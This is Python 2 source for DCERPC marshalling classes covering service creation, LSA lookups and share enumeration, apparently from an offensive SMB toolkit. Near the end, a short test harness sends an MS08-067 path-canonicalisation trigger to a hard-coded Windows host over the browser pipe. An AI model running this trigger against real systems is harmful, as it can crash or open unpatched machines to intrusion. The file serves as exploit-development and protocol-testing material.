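def __init__(self, data=None, machine_name='', database_name='', desired_access=0, is_unicode=True):
    """Build or parse a request made of MachineName, DatabaseName and DesiredAccess.

    The enclosing class is not visible here; the field set suggests an
    OpenSCManager-style request (confirm against the class header).

    Parse branch (``data`` given): walks the bytes in wire order.  Each string
    is preceded by a 4-byte referent id, which this method reads into the
    corresponding ``*Ptr`` field before handing the remainder to
    ``DCERPCString``.  The three 32-bit fields are stored as ints -- the
    original stored the 1-tuples returned by ``struct.unpack`` here, which
    does not match the ints the build branch stores (0x20004, 0x20008,
    ``desired_access``) nor the ``[0]`` convention used by the other parsers
    in this file.

    Build branch: an empty name leaves the string and its pointer at the
    Struct defaults (a null pointer).

    :param data: raw request bytes, or None to build from the keyword args
    :param machine_name: unicode machine name, encoded as UTF-16LE
    :param database_name: unicode database name, encoded as UTF-16LE
    :param desired_access: access mask stored in DesiredAccess
    :param is_unicode: accepted for interface compatibility; not used here
    :raises struct.error: on truncated input (offsets are not bounds-checked
        beyond what ``unpack`` enforces; DCERPCString's handling of short
        input is not visible in this file)
    """
    Struct.__init__(self, data)
    if data is not None:
        pos = 0
        self['MachineNamePtr'] = unpack('<L', data[pos:pos + 4])[0]
        pos += 4
        self['MachineName'] = DCERPCString(data=data[pos:])
        pos += len(self['MachineName'].pack())
        self['DatabaseNamePtr'] = unpack('<L', data[pos:pos + 4])[0]
        pos += 4
        self['DatabaseName'] = DCERPCString(data=data[pos:])
        pos += len(self['DatabaseName'].pack())
        self['DesiredAccess'] = unpack('<L', data[pos:pos + 4])[0]
    else:
        if len(machine_name):
            self['MachineName'] = DCERPCString(
                string=machine_name.encode('UTF-16LE'))
            self['MachineNamePtr'] = 0x20004
        if len(database_name):
            self['DatabaseName'] = DCERPCString(
                string=database_name.encode('UTF-16LE'))
            self['DatabaseNamePtr'] = 0x20008
        self['DesiredAccess'] = desired_access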
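def __init__(self, data=None, extradata=None):
    """Parse a translated-name entry whose string body lives in ``extradata``.

    ``Struct.__init__`` parses the fixed-size header from ``data``.  When the
    header's ``Length`` is 0 the name is the empty string; otherwise the name
    is decoded from ``extradata``, which the caller is expected to position at
    the start of this entry's deferred string.  The unused ``pos`` local of
    the original has been dropped; nothing else changes.

    :param data: raw bytes of the fixed-size entry, or None to build an
        empty instance
    :param extradata: bytes of the deferred string area for this entry
    """
    Struct.__init__(self, data)
    if data is None:
        return
    if self['Length'] == 0:
        self['Name'] = DCERPCString(string='')
    else:
        self['Name'] = DCERPCString(data=extradata)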
def pack(self):
    """Serialise ServerName (as a unique pointer), NetName and Level.

    A non-empty ServerName is emitted as referent id 0x20004 followed by the
    string; an empty one is emitted as a 4-byte null pointer only.
    """
    parts = []
    server_name = self['ServerName']
    if len(server_name):
        parts.append(pack('<L', 0x20004))
        parts.append(DCERPCString(string=server_name).pack())
    else:
        parts.append(pack('<L', 0))  # Null Ptr
    parts.append(DCERPCString(string=self['NetName']).pack())
    parts.append(pack('<L', self['Level']))
    return ''.join(parts)
def pack(self):
    """Serialise the share array.

    Layout: the Struct header, then for each of ``MaxCount`` shares a
    referent id / share type / referent id triple, then -- in the same
    order -- the deferred UTF-16LE name and comment strings.  The referent
    ids are synthesised as 0x20010 + 4*i and 0x20100 + 4*i.
    """
    out = [Struct.pack(self)]
    count = self['MaxCount']
    # First pass: fixed-size part of every entry.
    for idx in xrange(count):
        share = self.shares[idx]
        out.append(pack('<L', 0x20010 + idx * 4))
        out.append(pack('<L', share['type']))
        out.append(pack('<L', 0x20100 + idx * 4))
    # Second pass: the deferred strings, name then comment per entry.
    for idx in xrange(count):
        share = self.shares[idx]
        out.append(DCERPCString(string=share['name'].encode('UTF-16LE'),
                                is_unicode=True).pack())
        out.append(DCERPCString(string=share['comment'].encode('UTF-16LE'),
                                is_unicode=True).pack())
    return ''.join(out)
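def __init__(self, data=None, manager_handle='', service_name='', is_unicode=True):
    """Build or parse a request of ManagerHandle, ServiceName and AccessMask.

    Parse branch: ManagerHandle is the first 20 raw bytes, ServiceName a
    DCERPCString, AccessMask a little-endian 32-bit int.  Both ``unpack``
    results are indexed with ``[0]`` so the fields hold a 20-byte string and
    an int rather than the 1-tuples the original stored (the build branch and
    the other parsers in this file store plain values).

    Build branch: AccessMask is not set and keeps the Struct default.

    :param data: raw request bytes, or None to build from the keyword args
    :param manager_handle: 20-byte handle stored verbatim
    :param service_name: unicode service name, encoded as UTF-16LE
    :param is_unicode: accepted for interface compatibility; not used here
    :raises struct.error: on input shorter than the fixed fields require
    """
    Struct.__init__(self, data)
    if data is not None:
        pos = 0
        self['ManagerHandle'] = unpack('20s', data[pos:pos + 20])[0]
        pos += 20
        self['ServiceName'] = DCERPCString(data=data[pos:])
        pos += len(self['ServiceName'].pack())
        self['AccessMask'] = unpack('<L', data[pos:pos + 4])[0]
    else:
        self['ManagerHandle'] = manager_handle
        self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))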
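def __init__(self, data=None, ShareArray=None):
    """Build or parse an array of shares (``self.shares``: dicts with
    ``type``, ``name``, ``comment``).

    Parse branch: after the Struct header come ``MaxCount`` fixed-size
    entries (referent id, type, referent id), then the deferred name and
    comment strings in the same order.  Each string is decoded from UTF-16LE
    and re-encoded as ASCII with its final character dropped (presumably the
    NUL terminator -- not verifiable from this file).  Non-ASCII share names
    therefore raise UnicodeEncodeError; that is pre-existing behaviour.

    Build branch: ``self.shares`` aliases the ``ShareArray`` argument.  The
    default is now None (a fresh empty list per instance) instead of a
    mutable ``[]`` shared by every instance that used the default; passing
    an explicit list behaves exactly as before.

    :param data: raw bytes, or None to build from ``ShareArray``
    :param ShareArray: list of share dicts; None means an empty list
    :raises struct.error: on input too short for the fixed-size entries
    """
    Struct.__init__(self, data)
    self.shares = []
    if data is not None:
        pos = self.calcsize()
        for _ in xrange(self['MaxCount']):
            unpack('<L', data[pos:pos + 4])  # referent id; value unused
            pos += 4
            stype = unpack('<L', data[pos:pos + 4])[0]
            pos += 4
            self.shares.append({'type': stype})
            unpack('<L', data[pos:pos + 4])  # referent id; value unused
            pos += 4
        for share in self.shares:
            name = DCERPCString(data=data[pos:])
            share['name'] = name.get_string().decode(
                'UTF-16LE').encode('ascii')[:-1]
            pos += len(name.pack())
            comment = DCERPCString(data=data[pos:])
            share['comment'] = comment.get_string().decode(
                'UTF-16LE').encode('ascii')[:-1]
            pos += len(comment.pack())
    else:
        self.shares = [] if ShareArray is None else ShareArray
        self['MaxCount'] = len(self.shares)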
def __init__(self, data=None, service_handle='', args=[], is_unicode=True):
    """Build or parse a request carrying a service handle and an argv list.

    Build branch: ``argc`` is ``len(args)`` and every argument becomes an
    ASCII (non-unicode) DCERPCString.

    Parse branch: argv strings are read starting at fixed offset 28.
    NOTE(review): ``argc`` is taken from ``len(args)`` here too, not from the
    parsed header, so with the default ``args`` no argv entry is decoded --
    confirm whether ``self['argc']`` from the header was intended.
    """
    Struct.__init__(self, data)
    if data:
        pos = 28
        self['argc'] = len(args)
        self['argv'] = []
        for _ in xrange(self['argc']):
            entry = DCERPCString(data=data[pos:])
            self['argv'].append(entry)
            pos += len(entry.pack())
    else:
        self['ServiceHandle'] = service_handle
        self['argc'] = len(args)
        self['argv'] = [
            DCERPCString(string=item.encode('ASCII'), is_unicode=False)
            for item in args
        ]
def pack(self):
    """Serialise a lookup-names request.

    Order: raw PolicyHandle, Count twice, one header per name (two 16-bit
    sizes and a referent id 2+i), the deferred name strings packed with
    ``force_null_byte=0``, padding to a 4-byte boundary, an empty
    LsaTransSidArray, LsaLookupLevel, 16 bits of padding and a zero Count.
    """
    names = self['NamesArray']
    count = self['Count']
    out = [self['PolicyHandle'], pack('<L', count), pack('<L', count)]
    # Per-name headers; the size is len() of the stored string value.
    for idx, name in enumerate(names):
        size = len(name)
        out.append(pack('<HHL', size, size, 2 + idx))
    # Deferred string bodies.
    for name in names:
        out.append(DCERPCString(string=name, is_unicode=True).pack(force_null_byte=0))
    data = ''.join(out)
    # Padding is mandatory: align to 4 bytes.
    remainder = len(data) % 4
    if remainder:
        data += '\0' * (4 - remainder)
    # SidsArray
    data += LsaTransSidArray().pack()
    # Level, then 16 bits of padding
    data += pack('<H', self['LsaLookupLevel'])
    data += pack('<H', 0)
    # Count
    data += pack('<L', 0)
    return data
def pack(self):
    """Serialise: referent id 0x20004, the SystemName string, the raw
    ObjectAttributes bytes, then the Struct's fixed fields."""
    return ''.join([
        pack('<L', 0x20004),
        DCERPCString(string=self['SystemName']).pack(),
        self['ObjectAttributes'],
        Struct.pack(self),
    ])
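def __init__(self, data=None, UsernameArray=None):
    """Build or parse an array of user names (``self.usernames``).

    Parse branch: after the Struct header come ``MaxCount`` referent ids,
    then ``MaxCount`` deferred strings, each decoded from UTF-16LE, encoded
    as ASCII and stripped of its final character (presumably the NUL
    terminator -- not verifiable here).  The original called
    ``Struct.__init__`` a second time in this branch; that redundant call
    is removed.  NOTE(review): ``self['UsernameArray']`` is set from the
    *argument* in this branch, not from the names just decoded -- kept
    as-is, confirm the intent.

    Build branch: ``self.usernames`` aliases the argument.  The default is
    now None (fresh empty list per instance) instead of a ``[]`` shared by
    every instance using the default; an explicit list behaves as before.

    :param data: raw bytes, or None to build from ``UsernameArray``
    :param UsernameArray: list of names; None means an empty list
    :raises struct.error: on input too short for the referent ids
    """
    Struct.__init__(self, data)
    self.usernames = []
    names = [] if UsernameArray is None else UsernameArray
    if data is not None:
        pos = self.calcsize()
        for _ in xrange(self['MaxCount']):
            unpack('<L', data[pos:pos + 4])  # referent id; value unused
            pos += 4
        for _ in xrange(self['MaxCount']):
            s = DCERPCString(data=data[pos:])
            self.usernames.append(
                s.get_string().decode('UTF-16LE').encode('ascii')[:-1])
            pos += len(s.pack())
        self['UsernameArray'] = ''.join(names)
    else:
        self.usernames = names
        self['MaxCount'] = len(self.usernames)
        self['UsernameArray'] = ''.join(names)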
def pack(self):
    """Serialise ServerName (unique pointer), UserInfo, PrefMaxLen and
    ResumeHandle.

    A non-empty ServerName is emitted as referent id 0x20004 followed by
    the string; an empty one as a 4-byte null pointer only.
    """
    parts = []
    server_name = self['ServerName']
    if len(server_name):
        parts.append(pack('<L', 0x20004))
        parts.append(DCERPCString(string=server_name).pack())
    else:
        parts.append(pack('<L', 0))  # Null Ptr
    parts.append(self['UserInfo'].pack())
    parts.append(pack('<L', self['PrefMaxLen']))
    parts.append(self['ResumeHandle'].pack())
    return ''.join(parts)
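def __init__(self, data=None, manager_handle='\x00'*20, service_name='', binary_pathname='', display_name='', start_type=SVCCTL_SERVICE_DEMAND_START, is_unicode=True):
    """Build or parse a create-service style request.

    Build branch (``data`` is None): ManagerHandle is stored raw (20 bytes),
    ServiceName and BinaryPathName become UTF-16LE DCERPCStrings,
    DisplayNamePtr is 0x20004 with a DisplayName string when
    ``display_name`` is non-empty and 0 otherwise, and ServiceStartType is
    ``start_type``.  Other fields keep the Struct defaults.

    Parse branch: walks ``data`` in wire order.  Three fixes relative to
    the original: (1) 32-bit fields are decoded to ints (the original kept
    raw 4-byte slices, so ``if self['DependenciesPtr']:`` was true even
    for a zero pointer and the pointer checks always fired); (2) the
    4-byte DisplayNamePtr is skipped before the DisplayName string, as the
    other parsers in this file do, and the string is only read when the
    pointer is non-zero; (3) ``logging.eror`` is corrected to
    ``logging.error`` and each message names the pointer that was
    actually non-zero.  A non-zero DependenciesPtr, ServiceStartNamePtr
    or PasswordPtr is still unsupported: the error is logged and parsing
    stops, leaving the remaining fields unset.

    :param is_unicode: accepted for interface compatibility; not used here
    :raises struct.error: on input too short for a fixed-size field
    """
    Struct.__init__(self, data)
    if data is None:
        self['ManagerHandle'] = manager_handle
        self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))
        self['BinaryPathName'] = DCERPCString(string=binary_pathname.encode('UTF-16LE'))
        if len(display_name):
            self['DisplayName'] = DCERPCString(string=display_name.encode('UTF-16LE'))
            self['DisplayNamePtr'] = 0x20004
        else:
            self['DisplayNamePtr'] = 0
        self['ServiceStartType'] = start_type
        return

    def u32(at):
        # Little-endian 32-bit field at offset `at` of `data`.
        return unpack('<L', data[at:at + 4])[0]

    pos = 0
    self['ManagerHandle'] = data[pos:pos + 20]
    pos += 20
    self['ServiceName'] = DCERPCString(data=data[pos:])
    pos += len(self['ServiceName'].pack())
    self['DisplayNamePtr'] = u32(pos)
    pos += 4
    if self['DisplayNamePtr']:
        self['DisplayName'] = DCERPCString(data=data[pos:])
        pos += len(self['DisplayName'].pack())
    self['AccessMask'] = u32(pos)
    pos += 4
    self['ServiceType'] = u32(pos)
    pos += 4
    self['ServiceStartType'] = u32(pos)
    pos += 4
    self['ServiceErrorControl'] = u32(pos)
    pos += 4
    self['BinaryPathName'] = DCERPCString(data=data[pos:])
    pos += len(self['BinaryPathName'].pack())
    self['LoadOrderGroupPtr'] = u32(pos)
    pos += 4
    self['TagId'] = u32(pos)
    pos += 4
    self['DependenciesPtr'] = u32(pos)
    if self['DependenciesPtr']:
        logging.error('SVCCTL_ERROR: DependenciesPtr != 0')
        return
    pos += 4
    self['DependSize'] = u32(pos)
    pos += 4
    self['ServiceStartNamePtr'] = u32(pos)
    if self['ServiceStartNamePtr']:
        logging.error('SVCCTL_ERROR: ServiceStartNamePtr != 0')
        return
    pos += 4
    self['PasswordPtr'] = u32(pos)
    if self['PasswordPtr']:
        logging.error('SVCCTL_ERROR: PasswordPtr != 0')
        return
    pos += 4
    self['PasswordSize'] = u32(pos)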
def __init__(self, data=None, Name='', Sid=''):
    """Build a name/SID pair; parsing is delegated entirely to Struct.

    With ``data`` given nothing beyond ``Struct.__init__`` happens.  When
    building, a non-None ``Name`` sets NameLength/NameSize to ``len(Name)``
    (the length of the *unencoded* value -- NOTE(review): if the wire
    format wants the UTF-16LE byte length this is half of it; confirm),
    NamePtr to 0x2000040 and NameString to the UTF-16LE string; a non-None
    ``Sid`` sets SidPtr to 0x2000050 and a DCERPCSid.  The defaults are
    empty strings, so both branches run unless None is passed explicitly.
    """
    Struct.__init__(self, data)
    if data is not None:
        return
    if Name is not None:
        name_len = len(Name)
        self['NameLength'] = name_len
        self['NameSize'] = name_len
        self['NamePtr'] = 0x2000040
        self['NameString'] = DCERPCString(string=Name.encode('UTF-16LE'))
    if Sid is not None:
        self['SidPtr'] = 0x2000050
        self['Sid'] = DCERPCSid(Sid=Sid)
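def __init__(self, data=None, Sids=None):
    """Build or parse an array of translated names.

    Parse branch: ``Count`` fixed-size LsaTranslatedNameEx2 entries follow
    the Struct header; their string bodies follow all entries, in order.
    ``pos1`` tracks the entry being read and ``pos2`` the next deferred
    string, which is advanced by the packed length of the entry's name
    (computed with ``is_unicode=False``, as in the original).

    Build branch: stores ``Sids`` and sets Count/MaxCount to its length
    and NamesPtr to 0x020010.  The default is now None (a fresh empty list
    per instance) instead of a ``[]`` shared by every instance that used
    the default; passing an explicit list behaves exactly as before.

    :param data: raw bytes, or None to build from ``Sids``
    :param Sids: list of SIDs; None means an empty list
    """
    Struct.__init__(self, data)
    if data is not None:
        pos1 = self.calcsize()
        objsize = LsaTranslatedNameEx2().calcsize()
        # Deferred string area starts after all fixed-size entries.
        pos2 = pos1 + objsize * self['Count']
        self['Names'] = []
        for _ in xrange(self['Count']):
            name = LsaTranslatedNameEx2(data=data[pos1:], extradata=data[pos2:])
            self['Names'].append(name)
            pos1 += name.calcsize()
            name_str = name.get_name()['Name']
            if len(name_str):
                pos2 += len(
                    DCERPCString(string=name_str, is_unicode=False).pack())
    else:
        sids = [] if Sids is None else Sids
        self['Count'] = len(sids)
        self['NamesPtr'] = 0x020010
        self['MaxCount'] = len(sids)
        self['Sids'] = sids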
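def __init__(self, data=None, ShareArray=None):
    """Parse a single share-info entry.

    Wire order: two referent ids, Type, a referent id, Permission, MaxUses,
    CurrentUses, two referent ids, then the deferred NetName, Comment, Path
    and Passwd strings.  Each string is decoded from UTF-16LE, re-encoded
    as ASCII and stripped of its final character (presumably the NUL
    terminator -- not verifiable here); non-ASCII values raise
    UnicodeEncodeError, as before.  Referent ids are still unpacked (which
    validates that the bytes are present) but no longer bound to unused
    locals.

    Building from ``ShareArray`` is not implemented (TODO in the original);
    the argument is unused and its default is now None rather than a
    shared mutable ``[]``.

    :param data: raw bytes of one entry, or None
    :param ShareArray: unused
    :raises struct.error: on input too short for a fixed-size field
    """
    Struct.__init__(self, data)
    self.shares = []
    if data is None:
        # TODO: build an entry from ShareArray.
        return

    def u32(at):
        # Little-endian 32-bit field at offset `at` of `data`.
        return unpack('<L', data[at:at + 4])[0]

    def read_str(at):
        # Decode the DCERPCString at `at`; return (ascii text, next offset).
        s = DCERPCString(data=data[at:])
        text = s.get_string().decode('UTF-16LE').encode('ascii')[:-1]
        return text, at + len(s.pack())

    pos = 0
    u32(pos)  # referent id; value unused
    pos += 4
    u32(pos)  # referent id; value unused
    pos += 4
    self['Type'] = u32(pos)
    pos += 4
    u32(pos)  # referent id; value unused
    pos += 4
    self['Permission'] = u32(pos)
    pos += 4
    self['MaxUses'] = u32(pos)
    pos += 4
    self['CurrentUses'] = u32(pos)
    pos += 4
    u32(pos)  # referent id; value unused
    pos += 4
    u32(pos)  # referent id; value unused
    pos += 4
    self['NetName'], pos = read_str(pos)
    self['Comment'], pos = read_str(pos)
    self['Path'], pos = read_str(pos)
    self['Passwd'], pos = read_str(pos)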
# Stand-alone test harness (Python 2 syntax: print statements, str bytes).
# Builds one request body with the project's DCERPCString helper, sends it to
# a hard-coded host over a named-pipe DCERPC binding and prints the raw reply
# as hex.  It performs network I/O at import time and has no entry guard, so
# it must not be imported as a module.
import sys
from struct import pack
if '.' not in sys.path:
    sys.path.append('.')
from libs.newsmb.libdcerpc import DCERPC, DCERPCString
print '***** Testing Windows 2000 Trigger for MS08-067 *****'
path = u'A\\..\\..\\'.encode('UTF-16LE')
mark = len(path)  # offset recorded but not used below
path += u'\0'.encode('UTF-16LE')
# Request body: the individual fields are concatenated in wire order.
data =''
data += pack('<L', 1)
data += DCERPCString(string = u'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'.encode('UTF-16LE')).pack()
data += '\0\0'
data += DCERPCString(string = path).pack()
data += '\0\0'
data += pack('<L', 2)
data += DCERPCString(string = u'\\'.encode('UTF-16LE')).pack()
data += pack('<LL', 1, 1)
# Target endpoint is hard-coded; getsock=None leaves socket creation to DCERPC.
dce = DCERPC(u'ncacn_np:192.168.2.107[\\browser]', getsock=None)
#dce.max_dcefrag = 100
dce.bind(u'4b324fc8-1670-01d3-1278-5a47bf6ee188', u'3.0') #, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.call(0x1f, data, response=True)
print dce.reassembled_data.encode('hex')
def unpack_name(self, data):
    """Decode the NameString field from the raw bytes in ``data``."""
    name = DCERPCString(data=data)
    self['NameString'] = name